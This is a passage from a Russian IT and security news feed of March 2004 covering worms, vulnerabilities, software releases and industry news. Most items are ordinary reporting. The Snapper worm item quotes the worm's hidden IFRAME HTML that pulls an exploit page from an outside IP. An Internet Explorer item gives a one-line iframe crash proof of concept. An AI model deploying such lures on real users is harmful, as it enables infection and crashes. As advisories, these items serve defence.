никак не комментируют, но в настоящее время он функционирует нормально.
Подробности - http://story.news.yahoo.com/news?tmpl=story...

24/03/2004 13:23 Появление червя Snapper.
"Лаборатория Касперского" сообщает об обнаружении нового почтового червя I-Worm.Snapper, распространяющегося через интернет в виде ссылки на зараженный веб-сайт. Зараженные письма содержат в себе HTML код: <HTML><BODY><IFRAME src='http://198.170.245.129/[censored by KL].htm'
style='display:none'></IFRAME></HTML></BODY>. При обращении по данной ссылке происходит использование уязвимости Internet Explorer, описанной в бюллетене MS03-040, в результате чего в системе исполняется скриптовый троянец. Данная троянская программа извлекает из себя и устанавливает в систему основной файл червя "IELOAD.DLL". Червь представляет собой PE DLL-файл, размером около 8KB (8704 байт). Данный файл устанавливается в системный каталог Windows и запускается как системная библиотека. Червь рассылает письмо со ссылкой по всем адресам электронной почты, найденным в адресной книге MS Outlook. Для отправки писем червь использует указанный в системе SMTP сервер. Подробное описание червя появится в ближайшее время.
Исчтоник - http://www.viruslist.com

24/03/2004 13:05 Появление очередной разновидности червя Netsky.
"Лаборатория Касперского" сообщает об учащении случаев заражения новой версией почтового червя I-Worm.NetSky.q. Данная версия была обнаружена 21 марта, однако лишь теперь уровень её распространенности превысил критическую отметку. Червь распространяется через интернет в виде вложений в зараженные электронные письма. Также червь обладает функцией размножения через P2P-сети и доступные HTTP и FTP каталоги. Основной компонент червя представляет собой PE EXE-файл, размером около 29KB. Червь упакован FSG, размер распакованного файла около 40KB.
Характеристики зараженных писем Зараженные письма формируются из произвольных комбинаций. Адрес отправителя выбирается произвольно из числа найденных на зараженной машине. Тема формируется из набора заготовок. То же самое касается и текста письма. Также червь может дописывать в конец зараженного письма ложное сообщение о том, что данное письмо было проверено каким-либо антивирусом. Имя вложения имеет множество различных вариантов. Зачастую это файлы с двойным расширением, где первое "doc" или "txt", а второе выбирается из списка: .exe, .pif, .scr. Также червь способен посылать свои копии в виде ZIP-архивов. Червь может посылать письма, содержащие IFRAME Exploit (аналогично червям Klez.h или Swen). В таком случае, при просмотре письма из уязвимого почтового клиента, произойдет автоматический запуск вложенного файла червя.
Источник - http://www.kaspersky.ru

24/03/2004 12:26 Американские спецслужбы поймали хакера, шантажировавшего Google.
Секретная служба США (U.S. Secret Service) арестовала программиста из американского штата Калифорния по подозрению во взломе рекламной системы AdSense компании Google, сообщает интернет-издание InternetNews.com со ссылкой на газету Wall Street Journal. Система AdSense, интегрированная с поисковой машиной Google, предназначена для организации рекламных площадок на сайтах-участниках. Владельцы сайтов, присоединившиеся к системе, отводят на своих страницах рекламное место для баннеров AdSense, а система подбирает для показа там проплаченную рекламу, содержание которой близко содержанию сайта. Таким образом посетители сайтов определенной тематики видят на них рекламу соответствующей тематики, и, следовательно, более заинтересованы в переходе на рекламируемые таким образом сайты. Таким образом сайты-рекламодатели получают целевую аудиторию, заинтересованную в их продукте, а владельцы сайтов-участников AdSense получают отчисления за переходы пользователей по рекламным баннерам. 32-летний калифорниец Майкл Брэдли (Michael Bradley), как предполагают следственные органы, создал программу Google Clique, которая имитирует массовые переходы пользователей по таким баннерам, способствуя накоплению денег на счетах участников AdSense. Изначально Брэдли делал программу для неизвестного заказчика, однако он отказался платить, после чего Брэдли в начале марта связался с представителями Google и потребовал от них 100 тысяч долларов. В противном случае программист грозил начать продажи своей программы спаммерам, что, по его мнению, дискредитировало бы и систему AdSense, и Google.
Подробнее - http://www.clickz.com/news/article.php/3329381

23/03/2004 17:50 Модернизация интернета продвигается вперед.
Интернет следующего поколения — Internet Protocol version 6 — сделал еще один важный шаг на пути к коммерциализации: на прошлой неделе завершился второй этап его испытаний в Северной Америке. Используемая для испытаний сеть Moonv6 представляет собой магистраль IPv6, построенную совместными усилиями лаборатории InterOperability Laboratory (IOL) при Университете штата Нью-Гэмпшир, North American IPv6 Task Force, Internet2, Министерства обороны США и свыше 40 поставщиков сетевого оборудования, испытателей и сервис-провайдеров. Виртуальная магистраль IPv6 протянулась от Нью-Гэмпшира до Калифорнии и будет работать постоянно, так что теперь производители оборудования, поставщики ПО, сервис-провайдеры и все остальные, кто желает проверить взаимодействие своих продуктов с IPv6, могут сделать это в действующей сети. В продолжение двух недель марта North American IPv6 Task Force, Объединенная группа тестирования на совместимость Агентства оборонных информационных систем и другие организации проводили испытания на качество обслуживания сети, безопасность, управление приложениями, функционирование сетевых протоколов и сквозную работу сервера доменных имен со всеми основными операционными системами.
Подробности - http://zdnet.com.com/2100-1104_2-5177463.html

23/03/2004 17:12 Перерождение проекта FreeS/WAN.
В начале марта было опубликовано объявление о закрытии проекта FreeS/WAN (IPSEC и IKE для Linux), но все оказалось не так мрачно - проект практически сразу подхватили другие разработчики и создали на его основе новую ветку - Openswan, cообщает opennet.ru.
Подробности - http://slashdot.org/article.pl?sid=04/03/23/0222229

23/03/2004 15:43 Выход Linux Netwosix 1.1.
Vincenzo Ciaglia анонсировал выход очередной версии одного из многочисленных дистрибутивов Linux - Linux Netwosix 1.1. Как пишет сам автор, этот дистрибутив представляет собой оптимизированный для серверов Linux c упором на работу с сетью по защищзённым протоколам. В новой версии убраны различные баги, обнаруженные в версии 1.0. При этом сообщается, что механизм обновления (апдейта) на настоящий момент не работает (обещают устранить это в новой версии) и поэтому систему надо ставить с нуля. В новую версию включены: ядро 2.6.4; системные бинарники, слинкованные с билиотекой glibc 2.3.2; возможность инсталляции из двух источников - .tgz и .tar.gz, Iptables 1.2.7a, компилятор gcc 3.3.2; Perl 5.8.2 и др. При этом размер установленного дистрибутива не превышает 450 мегабайт. Опционально могут устанавливаться: XFre86 в качестве X-сервера, Apache 2.0.48 в качестве Вэб-сервера, поддержка шифрования сетевого трафика при помощи OpenSSL etc.
Подробности - http://www.netwosix.org/

23/03/2004 15:01 Сайт с документацией по системам.
Копаясь тут по закладкам и старым ссылкам обнаружил довольно неплохой и, главное, очень полезный сайт Dreamcatcher.ru, на котором выложены очень интересные статьи по тематике FreeBSD, CISCO, Win2K, VoIP. Представлены следующие разделы: операционные системы, сервисы и службы, программирование в *nix, маршрутизаторы и коммутаторы CISCO, общие вопросы, Windows2000. основная часть статей выложена на самоом сервере, часть представлена ссылками. Рекомендуем ознакомиться со списком и почитать то, что вас заинтересовало.
Сайт - http://www.dreamcatcher.ru/statiy.html

23/03/2004 14:20 Создан сайт российской киберполиции.
Создан российский Научно-информационный сайт "Компьютерная преступность и борьба с нею", cообщает crime-research.ru. Сайт состоит из следующих разделов: система защиты информации в России; законодательство в сфере информации, информатизации и защиты информации; понятие и классификация компьютерных преступлений; антология компьютерных преступлений в России; всё о компьютерных правонарушителях; подразделения по борьбе с компьютерными преступлениями в России; понятие и назначение «СОРМ»; библиотека публикаций; форум. Кстати, ранее у подобного подразделения существовал сайт www.cyberpolice.ru, но в настоящий момент на нём крутится сайт, посвящённый борьбе со спамом.
Сайт - http://www.cyberpol.ru/

23/03/2004 13:07 Sun планирует выпустить трехмерный Linux-десктоп.
Sun Microsystems, начала работы над экспериментальным проектом - Looking Glass. Это будет десктоп нового поколения для Linux. Планируются обсуждение проекта с Linux community на X Windows Systems Developer's Meeting в конце апреля.
Подробности - http://www.linuxplanet.com/linuxplanet/reports/5303/1/

23/03/2004 12:13 Караван" (Москва) отвергает обвинения в поддержке террористов.
Московская компания "Караван" распространила вчера следующее заявление: "Компания "Караван" не причастна к поддержке сайта палестинских террористов. 22 марта 2004 в газете "Новые Известия" и на некоторых других информационных ресурсах, прошла информация о том, что компания "Караван" разместила на своих мощностях сайт террористической организации ХАМАС. Компания "Караван" официально заявляет, что сайт с IP адресом 217.23.144.158 не размещается на серверах "Каравана". Этот сайт был размещен в дата-центре "Каравана" на одном из многочисленных серверов клиентов. Согласно договору оферты "Караван" не контролирует информацию, размещаемую на серверах наших клиентов и не несет ответственность за информационное содержание сайта. Более того, "Караван" предоставляет технические возможности для функционирования серверов. Администрирование и контроль ресурсов осуществляется клиентами самостоятельно. Именно поэтому в заключаемом с клиентом договоре отдельно оговаривается, что всю ответственность за размещаемую на сервере информацию клиент несет индивидуально. Согласно договору клиенту запрещается размещать информацию, противоречащую законодательству РФ, а именно нарушение авторских прав, пропаганда насилия и т.д. Для контроля факта нарушения законодательства РФ у государства существуют соответствующие институты. При поступлении в "Караван" официального запроса от правоохранительных органов, компания предоставит любую необходимую информацию. Компания "Караван" выражает недоумение по поводу информации о причастности к размещению на собственных ресурсах информации, пропагандирующей терроризм. "Караван", очень дорожит своей высокой репутацией и считает необходимым опубликования официального опровержения публикаций, содержащих порочащие и недостоверные сведения о связи с размещением информации, пропагандирующих терроризм".
Источник - http://www.caravan.ru/news.html?...

23/03/2004 11:40 VIA представила бесплатную утилиту для безопасности файлового обмена.
VIA Technologies объявила о выпуске программного пакета VIA Padlock Security, включающего утилиту безопасной корпоративной связи и набор инструментальных средств для разработки, которые обеспечивают открытую и масштабируемую структуру для обеспечения безопасных коммуникационных решений для корпоративных условий. Представленный как часть инициативы безопасности VIA Padlock, пакет VIA PadLock Security является инструментом, который позволяет вести чат и обеспечивает функциональность двухстороннего файлового обмена при помощи усовершенствованной PGP-модели публичного ключа и шифрованию AES, что дает возможность создания безопасных путей сообщения между пользователями. Пакет VIA PadLock Security полностью совместим со средами семейства ОС Microsoft Windows и Linux, а также совершенствует процедуру генерирования случайных чисел и возможности шифрования AES, встроенного в последнее ядро «C5P Nehemiah» процессоров VIA Eden, VIA C3 и VIA Antaur. Утилита VIA PadLock SL предлагается для свободного скачивания с сайта VIA, доступны версии под Windows и Linux под GNU (не Unix) публичной лицензии. Утилита будет функционировать на любой системе x86, но оптимизирована для использования с последними процессорами VIA Eden, VIA C3 и VIA Antaur, оснащенными ядром С5P Nehemiah.
Источник - http://www.cnews.ru

23/03/2004 11:24 Бета-версия Mozilla 1.7.
Сообщество разработчиков Mozilla.org выпустило бета-версию коммуникационного пакета Mozilla 1.7, включающего браузер, почтовый клиент, редактор HTML и клиент IRC. Напомним, что сейчас проект Mozilla развивается по двум направлениям: интегрированный коммуникационный пакет (Mozilla 1.x) и набор автономных приложений (браузер Firefox, почтовый клиент Thunderbird). В перспективе, именно второе направление станет основным. В Mozilla 1.7 разработчики реализовали немало нововведений. Еще в альфа-версии, выпущенной в феврале, были усовершенствованы функции блокировки всплывающих окон, добавилась долгожданная полноценная поддержка нескольких почтовых аккаунтов в почтовом клиенте. До этого почта могла приниматься из нескольких ящиков, но отправлялась только через один SMTP-сервер, используя только один из доступных адресов. При использовании нескольких почтовых ящиков это создавало путаницу, и теперь при отправке письма можно выбирать нужный аккаунт из выпадающего списка. В бета-версии Mozilla 1.7 появилась опция, позволяющая отключать задействованную на некоторых сайтах блокировку контекстного меню с помощью javascript, были переделаны диалоги при работе с "куками", и появилась возможность просмотра сохраненных паролей (для этого пользователю нужно задать еще один пароль, открывающий текст, спрятанный за звездочками). В почтовом клиенте появилась поддержка IMAP IDLE, технологий MSN Authentication и Secure Password Authentication для доступа к почтовым ящикам по протоколам POP3 и IMAP.
Источник - http://www.lenta.ru

23/03/2004 10:48 ЕС оштрафует Microsoft на 497 миллионов евро.
Европейский союз наложит на корпорацию Microsoft штраф в 497 миллионов евро (613,5 миллиона долларов), сообщает Reuters. Об этом в понедельник заявил источник в антимонопольной комиссии ЕС. Как ожидается, в среду решение о применении к Microsoft штрафных санкций, будет единогласно принято членами комиссии. В этом случае, штраф, наложенный на компанию Билла Гейтса, станет самым крупным за историю ЕС. Антимонопольная комиссия ЕС обвинила Microsoft в намеренном ограничении доступа потребителей к аудио-визуальному программному обеспечению других компаний. Кроме штрафа, решением Антимонопольной комиссии ЕС, Microsoft будет обязана выпустить на рынок операционную систему Windows, в которую не будет включен проигрыватель Windows Media Player. По мнению комиссии, такая версия операционной системы стимулирует появление других мультимедийных программ для Windows, выпущенных конкурентами Билла Гейтса. Руководство Microsoft уже объявило решение о наложении такого крупного штрафа незаконным, и объявило, что будет оспаривать наложение штрафа в судебном порядке.
Подробности - http://cnn.netscape.cnn.com/ns/news/story.jsp?...

22/03/2004 16:34 IT: безопасность против преступности.
Любители обогатиться или просто немного развлечься при помощи высоких технологий предпочли не мелочиться. Недавно они выбрали своей мишенью крупнейший в Эстонии банк "Хансапанк". Как заявил журналистам пресс-секретарь финансового учреждения, банк подвергся атаке хакеров. Специалисты в этом вопросе полагают, что действия злоумышленников можно расценить как крупнейшее в странах Балтии нападение на банковские интернет-терминалы. По данным представителя пострадавшей стороны, на электронный адрес банка в 13 и 14 марта 2004 года были направлены тысячи запросов, что в конечном итоге привело к перегрузке портала банка и временному прекращению доступу в систему "Интернет-банк" зарубежных клиентов. К счастью, техническому персоналу "Хансапанк" удалось оказать злоумышленникам достойный отпор. Крупномасштабная атака хакеров была нейтрализована благодаря современным защитным технологиям банка. При этом личная информация и сбережения клиентов "Хансапанк" в результате атаки не пострадали. Руководство банка уже подало заявление в полицию с требованием возбудить уголовное дело по факту хакерской атаки.
Источник - http://www.crime-research.ru

22/03/2004 15:19 Выход Rootkit Hunter 1.0.0.
Вышла новая версия ещё одного сканера руткитов (закладок) в открытых системах, сообщается на linux.org.ru. Возможности: ищет файлы, используемые популярными руткитами, проверяет права доступа к файлам, умеет запоминать MD5 и отслеживать измененные файлы, ищет скрытые файлы, проверяет модули на наличие сигнальных строк, умеет сканировать все подряд бинарные/текстовые файлы. Последняя опция будет особенно востребована пользователями антивируса Касперского, недавно перешедшим на Linux.
Подробности - http://www.rootkit.nl/projects/rootkit_hunter.html

22/03/2004 14:51 Американский "Эшелон" бдит пуще прежнего.
Ещё одна статья о знаменитой системе "Эшелон", созданной в США. Статья, авторами которой являются Владимир Иванов и Владимир Яременко, описывает структуру и состав системы "Эшелон" на сайте "Независимого военного обозрения". Впервые информация об "Эшелоне", управление которым осущесствляет АНБ (Агентство национальной безопасности), появилась в конце 90-х годов. В одном из американских изданий была опубликована информация о том, что США в сотрудничестве с Великобританией, Канадой, Австралией и Новой Зеландией приступили к созданию глобальной сети перехвата и анализа всех электронных средств связи - телефонной - обычной и сотовой, факсимильной, телексной, интернета и электронной почты. Кроме того, в ее поле видимости попадали и системы кабельной связи, проложенные по морскому дну между континентами. В "Эшелон" входит около 120 спутников связи, разведки и слежения, часть которых располагается на геостационарных орбитах. Собираемая информация направляется в память самых современных суперкомпьютеров, в которых осуществляется ее расшифровка. Она пропускается через так называемые "Словари Эшелона" - постоянно обновляемые базы ключевых слов. В них включаются имена людей, названия кораблей, организаций, стран, а также некоторые специальные термины. Ключами служат номера телефонов и факсов, электронные адреса в интернете, принадлежащие частным лицам, бизнесменам, организациям или правительственным службам. Кроме того, в состав "Эшелона" входят корабли слежения и приемопередающие станции, принадлежащие соответствующим организациям стран - участниц проекта, включая Директорат связи МО Австралии, Национальное бюро безопасности связи Новой Зеландии и канадское Управление закрытой связи.
Статья - http://nvo.ng.ru/spforces/2004-03-19/7_madrid.html

22/03/2004 14:42 Московские провайдеры увеличивают емкость международных каналов.
Московские телекоммуникационные компании "Караван" и "Комстар" сообщили о расширении международный каналов доступа в глобальную сеть интернет. "Караван" увеличил емкость каналов в полтора раза до 100 Мбит/с, "Комстар" - до 105 Мбит/с. Увеличиние емкости достигнуто за счет модернизации сети компании TeliaSonera, предоставляющей услуги международной связи. Причиной расширения канала стал возросший объем трафика, проходящего через сети компаний. Рост объема трафика происходит за счет притока новых корпоративных клиентов.
Источник - http://www.provider.net.ru

22/03/2004 14:20 Nokia, Philips и Sony продвигают новый стандарт беспроводной связи.
Компании Nokia, Philips и Sony учредили некоммерческую организацию NFC Forum, основная задача которой будет заключаться в продвижении нового стандарта беспроводной связи ближнего радиуса действия NFC (Near Field Communication). Чипы NFC используют частотный диапазон 13,56 МГц и позволяют передавать информацию на расстояние до нескольких сантиметров. Максимальная пропускная способность при этом составляет 424 кбит/с, минимальная - 106 кбит/с. Понятно, что с такими характеристиками беспроводная связь NFC вряд ли сможет заменить Wi-Fi или Bluetooth, однако участники NFC Forum уверены, что новый стандарт уже в ближайшие годы получит самое широкое распространение. В частности, микросхемы NFC планируется устанавливать в сотовые телефоны и коммуникаторы, карманные компьютеры и ноутбуки, телевизоры, аудиосистемы и прочую бытовую технику. В этом случае, к примеру, владелец портативного видеоплеера смог бы загрузить новые фильмы в память устройства, просто поднеся его к портативному компьютеру или десктопу. Аналогичным образом МР3-композиции могли бы передаваться с плееров на стационарные музыкальные центры, а сделанные при помощи встроенных в мобильники камер снимки - на телевизоры.
Источник - http://www.compulenta.ru

22/03/2004 14:08 Стандарты "голосового Web".
Консорциум W3C присвоил статус "рекомендуемых" спецификациям VoiceXML 2.0 и Speech Recognition Grammar Specification (SRGS). На данный момент две эти спецификации - единственные относящиеся к интерактивным речевым системам, ратифицированные независимой организацией по стандартизации. VoiceXML представляет собой язык описания доступных через телефоны интерактивных голосовых Web-служб, реализующих функции синтеза, записи и распознавания речи, а также распознавания голосовых и DTMF-команд. SRGS, в свою очередь, стандартизует способ указания слов и шаблонов слов, на которые должна реагировать система распознавания. VoiceXML предусматривает использование SRGS, а вместе они являются первыми компонентами Speech Interface Framework - разрабатываемого в W3C универсального набора языков разметки для интерактивных речевых приложений.
Источник - http://www.osp.ru

22/03/2004 13:46 IBM накачает Power на будущем мероприятии.
Впервые за длительное время компания расскажет о планах дальнейшего развития семейства своих процессоров. Отделение процессоров IBM, отвечающее за серверные чипы PowerPC и Power, обещает сделать это на специальном мероприятии в Нью-Йорке 31 марта. Ожидается, что топ-менеджеры компании расскажут о семействе процессоров Power и других проектах. Вероятно, темой обсуждения станут будущие процессоры, такие как Power 5 и Cell — совместная разработка IBM, Sony и Toshiba. Возможно, появится новая информация и о некоторых существующих процессорах PowerPC. Компания делает регулярные анонсы своих чипов, однако Motorola и другие конкуренты уделяют маркетингу процессоров гораздо больше внимания. Например, Intel и Motorola регулярно проводят конференции для разработчиков, которые используют для распространения информации о своих чипах в ИТ-индустрии и СМИ. Недавно IBM внесла ряд изменений в свой бизнес процессоров, включая выпуск новых моделей, создание производства на заказ и объединение отделения микроэлектроники с отделением серверов в рамках нового подразделения Systems and Technology Group. Аналитики считают это частью стратегии, направленной на лучшее ознакомление людей с семейством процессоров Power.
Подробности - http://www.zdnet.ru/?ID=428787

22/03/2004 13:11 Недельный отчет о вирусах Panda Software.
Выпущен традиционный еженедельный отчёт о вирусной активности прошедшей недели от компании Panda Software. Рассмотрены два червя: пять версий червя Bagle и две Netsky. Честно говоря, не совсем понятно - почему по-прежнему ни одна российская антивирусная компания не опубликовала новость о появлении трояна Witty, о котором мы сообщали вчера.
Подробности - http://www.viruslab.ru/press/index.php?go=show&num=255

22/03/2004 12:38 В интернете появится домен "только для взрослых".
Корпорация по распределению номеров и имен в Интернете (ICANN) заканчивает во вторник принимать заявки на новые доменные имена, сообщает CNN. Желание стать спонсорами доменов, предназначенных для отдельных видов деятельности, выразили уже 10 организаций, каждая из которых внесла по 45 тысяч долларов за подачу заявки. В течение апреля ICANN будет проводить публичное обсуждение предлагаемых нововведений, а в мае независимое жюри рассмотрит поданные заявки, и для одобренных им доменов будут разработаны специальные условия, на основании которых физические и юридические лица смогут регистрировать свои интернет-адреса в особых доменных зонах. Например, доменное имя ".ххх" спонсируется Международным фондом за сетевую ответственность, который планирует бороться с детской порнографией, контролируя содержание сайтов с "развлечениями для взрослых". Сайты, адрес которых будет иметь окончание ".mobi", будут предоставлять услуги пользователям мобильного интернета, среди которых владельцы ноутбуков и сотовых телефонов, работающих в протоколе WAP. Кроме этого, поступили заявки на такие доменные имена, как ".asia", ".cat", ".jobs", ".mail", ".post", ".tel" и ".travel".
Источник - http://www.cnn.com/2004/TECH/internet/03/20/new.domains.ap/index.html

21/03/2004 14:11 Как бы это почту проверить побыстрее?
Новая программа компании Phoenix, продемонстрированная на CeBIT, дает возможность проверить свежую почту, не загружая Windows и Outlook. Новая версия программы FirstWare Assistant, как пишет The Register, должна значительно облегчить жизнь владельцам ноутбуков и «планшетных» компьютеров, у которых часто возникает необходимость проверки информации, содержащейся в записной книжке или органайзере, «имплантированных» в программу Outlook. Сейчас таким пользователям приходится в течение нескольких минут дожидаться, пока их компьютер сначала протестируется, потом запустит Windows XP и, наконец, загрузит Outlook. Обновленная FirstWare Assistant позволяет проверить почту сразу после нажатия на кнопку «Вкл.» или подъема крышки ноутбука: достаточно ударить по клавише «F», чтобы получить мгновенный доступ ко всей информации, размещенной в органайзере. С помощью FirstWare Assistant компания Phoenix рассчитывает прикончить сразу двух зайцев: добить карманные компьютеры, которые и без того постепенно сдают позиции набирающим популярность смартфонам, а также подорвать позиции Microsoft и (возможно) других крупных производителей операционных систем. Дело в том, что через несколько лет поиграть в игрушку или включить mp3-плеер можно будет и без операционной системы
Источник - http://www.internet.ru

21/03/2004 13:40 Afick - утилита для защиты UNIX-систем.
В электронном журнале Linux Gazette опубликована неплохая статья Рика Николаса, посвящённая довольно интересной и полезной утилите под названием Afick. Утилита представляет собой snort и tripwire в одном флаконе. То есть, выполняет функции IDS (система определения и преотвращения попыток вторжений/взломов) и утилиты контроля целостности важных системных файлов (обычно выполняется на принципах построения и сравнения контрольных сумм). Утилита была написана Eric Gerbier и распространяется на условиях GPL как в исходных текстах, так и виде прекомпилированных пакетов (имеется, например, RPM-пакет для РедХэт-подобных дистрибутивов). В статье описан процесс инсталляции и конфигурирования утилиты для надёжной защиты *nix-подобной системы.
Статья - http://www.linuxgazette.com/node/view/8797

21/03/2004 12:58 Россия: на Урале рост числа мошенничеств с пластиковыми банковскими картами.
Сотрудники Управления по борьбе с экономическими преступлениями прогнозируют на Среднем Урале рост числа мошенничеств с пластиковыми банковскими картами. Как сказал сегодня на пресс-конференции в центре «ТАСС-Урал» заместитель начальника Управления по борьбе с экономическими преступлениями по Свердловской области Сергей Сунцов, в 2003 году были зафиксированы случаи мошенничества с пластиковыми картами системы «Visa». По этим фактам возбуждено 3 уголовных дела. По одному из них причиненный ущерб составил 900 тыс. рублей. «Самих фактов мошенничества с картами пока немного, но мы прогнозируем значительный рост. В связи с ростом числа карточек у населения и появлением новых технических средств число таких случаев может возрасти», - отметил С. Сунцов.
Источник - http://www.crime-research.ru

21/03/2004 12:33 Intel подтвердила слухи о переходе на новую маркировку процессоров.
В московском представительстве Intel корреспонденту "Компьюленты" подтвердили информацию о грядущем переходе на новую маркировку процессоров. Еще в начале недели в интернете со ссылкой на источники в Intel появились сенсационные сообщения о том, что в ближайшее время изменится маркировка всех процессоров корпорации: якобы вместо тактовой частоты будет указываться некий рейтинг производительности, по примеру компании AMD. По информации Intel, в мае-июне текущего года с появлением новых процессоров действительно будет введена новая маркировка - processor number ("число процессора"), которая представляет собой вовсе не рейтинг производительности, а своего рода идентификатор процессора того или иного семейства, обладающего определенным набором свойств. В частности, сохраняются хорошо известные торговые марки Pentium и Celeron, однако вместо тактовой частоты при маркировке будет указываться именно "число процессора". Планируется ввести три серии - 3хх, 5хх и 7хх. Индексы серии 3xx получат процессоры эконом-класса Celeron и Celeron M, индексы серии 5хх - процессоры Pentium 4 и Pentium 4-M, а индексы серии 7хх - процессоры высшего класса Pentium 4 EE и Pentium M. К примеру, условный процессор Pentium 4 3,20 c шиной 800 МГц и HT может называться просто "Pentium 4 550 с технологией HT". При этом в Intel не намерены скрывать тактовую частоту, объем кэш-памяти и прочие характеристики чипа: все они будут указаны на упаковке "боксовой" версии, и их можно будет изучить на официальном сайте корпорации. Первыми чипами, которые получат новую маркировку, станут мобильные Pentium M второго поколения на основе ядра Dothan, которые должны быть представлены в мае текущего года.
Источник - http://www.compulenta.ru

21/03/2004 11:48 Появление нового червя - Witty.
После сообщения об уязвимости в продуктах ISS, использующих протокол ICQ (RealSecure, Proventia, BlackICE), о которой мы сообщали вчера, тут же появился новый червь использующий эту уязвимость. Антивирусные компании назвали его Witty (другие названия - Blackworm, Black Ice). Подробнейший анализ червя был сделан компанией LURHQ, позже об этом черве написали F-Secure, также анализ провёл господин Johannes Ullrich (или госпожа - не суть важно) из института SANS. Червь распространяется от произвольного IP-адреса (заражённой машины, естественно) от имени порта 4000/UDP (что естественно - именно по этому протоколу идёт обмен с ICQ-сервером). Червь является исключительно сетевым и не распространяется посредством почты. После заражения червь посылает себя по 20000 случайным IP-адресам. UDP-пакет, посылаемый червем содержит 1025 байт, однако информационную нагрузку несут первые 470 байт (тело червя), остальное - содержимое памяти, содержащееся после выполнения переполнения буфера. После отсылки своего текста червь перезаписывает 65К случайных данных на жёстком диске заражённой машины. Примечательно, что червь не записывает свой код на диск и уничтожается из памяти после перезагрузки системы. Что касается поведения BlackIce, то после заражения пользователю не удастся отключить его через опции иконки в системном трэе. Вместо этого выводится сообщение "Operation could not be completed. Access is denied". Выпущены правила для Snort для определения деятельности червя. Особую опасность представляет случай порчи данных на жёстком диске, что может привести к невозможности дальнейшего функционирования системы. Для предотвращения паразитного трафика в сетях рекомендуется перекрыть входящий трафик с портом источника 4000. Удручает, что пока ни одна российская антивирусная компания на своём сайте не сообщила об этом черве.
Описание от LURHQ - http://www.lurhq.com/witty.html
Ещё подробности - http://isc.incidents.org/diary.html?date=2004-03-20

21/03/2004 11:12 Компания «МедиаКом» (ООО «МедиаКом», Ярославль) борется со спамом.
Возможно, информация, приведённая здесь будет полезна жителям Ярославля, если они посещают наш сайт. Компания «МедиаКом» (ООО «МедиаКом», Ярославль) сообщила, что на почтовом сервере mail.median.ru установлена система автоматического удаления спама. В течение ближайших недель система будет находиться в тестовом режиме, проходить автоматическое обучение для наиболее эффективного распознавания признаков массовой рассылки. Во время тестирования возможны случаи некорректного распознавания спама и блокировки нормальных писем. Особо подвержены опасности блокировки письма, содержащие HTML-код. В случае непрохождения каких-либо писем компания просит обращаться по адресу support@median.ru.
Источник - http://www.provider.net.ru/

21/03/2004 10:48 Американцы отказываются от электронной почты из-за спама.
29% американских интернет-пользователей сократили объем своей электронной переписки, и еще 63% заявили, что значительно меньше стали доверять этому средству коммуникации. Причиной указанных тенденций пользователи называют большой поток спама в общем почтовом объеме, сообщают организаторы социологического опроса, данные о котором публикует издание Sydney Morning Herald. Исследование, затрагивающее отношение американцев к электронной почте, было проведено компанией Pew Internet & American Life Project в период с 3 февраля по 1 марта. В опросе приняли участие 2204 совершеннолетних американца, из которых 1371 назвал себя интернет-пользователем. Величина погрешности, по данным исследователей, не превышает 3%. Аналогичный опрос, проведенный в июне прошлого года, показал, что использование электронной почты сократили 25% пользователей. В то же время об уменьшении доверия к электронным сообщениям сообщили 52% респондентов. По последним данным, из-за большого количества коммерческих материалов 77% пользователей считают пребывание в онлайне неприятным занятием. В июне прошлого года такую позицию занимали 70% опрошенных.
Источник - http://www.viruslist.com

20/03/2004 16:21 Mobius Release 5.
Вышла пятая версия open-source операционной системы для архитектуры IA-32 (i386 и совместимых с ней платформ) — Mobius Release 5, сообщает www.nixp.ru. Mobius создана быть «хорошей современной» ОС. Цели Mobius: быть достаточно расширяемой для того, чтобы можно было с легкостью изменять ОС для новых устройств и технологий; по возможности сохранять ядро системы максимально маленьким и модульным (Mobius помещается на одну дискету); по возможности поддерживать существующие приложения; быть достаточно простой для использования, чтобы пользователи могли ее устанавливать и настраивать без нужды в изучении системы.
Сайт проекта - http://mobius.sourceforge.net/

20/03/2004 16:17 Уязвимость в Winamp.
Tobias Welter сообщает, что обнаружена уязвимость в популярном плеере Winamp 5.02. При попытке открытия аудио-файла двойным кликом мыши в случае, если имя файла имеет имя более 246 символов плеер падает. Более подробной информации автор не предоставил.
Источник - http://www.securityfocus.com

20/03/2004 15:10 Переполнение буфера в обработчике ICQ протокола в нескольких программах от ISS.
Переполнение буфера обнаружено в множестве программ от ISS. Удаленный пользователь может выполнить произвольный код на целевой системе. Переполнение обнаружено в анализаторе ICQ протокола. Удаленный пользователь может послать специально сформированный пакет к уязвимому приложению, чтобы вызвать переполнение буфера и выполнить произвольный код на целевой системе. Уязвимыми оказались: RealSecure, Proventia, BlackICE. Выпущены обновления продуктов.
Подробности - http://www.securitylab.ru/43850.html

20/03/2004 13:57 Очередная уязвимость в Internet Explorer.
Rafel Ivgi из Израиля сообщает об обнаружении уязвимости в IE в ОС Windows XP. В IE была введена новая функция - "shell:", предназначенная для запуска некоторых функций удалённо. При этом Explorer.exe, который вызывается в этом случае содержит баг, возникающий при обработке пути к файлу, содержащим двойной слэш (//). При обработке подоных ссылок Explorer.exe благополучно падает. Сформировав на Вэб-странице ссылку, подобную <iframe src=shell:windows\system32\calc.exe></iframe> можно удалённо свалить приложение. В реестре существует ключ, от значения которого зависит будет ли перезапущен Explorer.exe. По умолчанию он включён. Рекомендуется его выставить в "0" ("AutoRestartShell"=dword:00000001 в ветви [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]).
Подробности - http://www.securityfocus.com/archive/1/358043/2004-03-17/2004-03-23/0

20/03/2004 13:29 Выход Apache 2.0.49.
Apache Software Foundation cообщает о выходе новой версии популярного Вэб-сервера Apache ветки 2.0 - 2.0.49. Как сообщается новая версия является в основном баго-фиксом. Однако, отмечает компания, в новой версии также устранены 3 уязвимости, обнаруженные в предыдущих версиях. Первая связана с возможностью вызова DoS из-за некорректной обработки множества "короткоживущих" (short-lived) соединений. Уязвимость обнаружена в ОС - IX, Solaris, Tru64 и не присутствует в FreeBSD и Linux. Вторая уязвимость связана с возможностью вставки пользователем (локальным) произвольных строк в системные файлы регистрации ошибок, что может привести к выполнению эксплоита на определённых типах эмуляторов терминалов при просмотре подобных файлов. Третья уязыимость связана с утечкой памяти при работе с модулем mod_ssl и может привести к исчерпанию системных ресурсов. Администраторам рекомендуют обновиться, при этом надо иметь в виду, что модули, откомпилированные для версии > 2.0.42 будут работать и в новой версии.
Подробности - http://www.apache.org/dist/httpd/Announcement2.html

20/03/2004 12:35 ПО для увеличения дисковой ёмкости сервера.
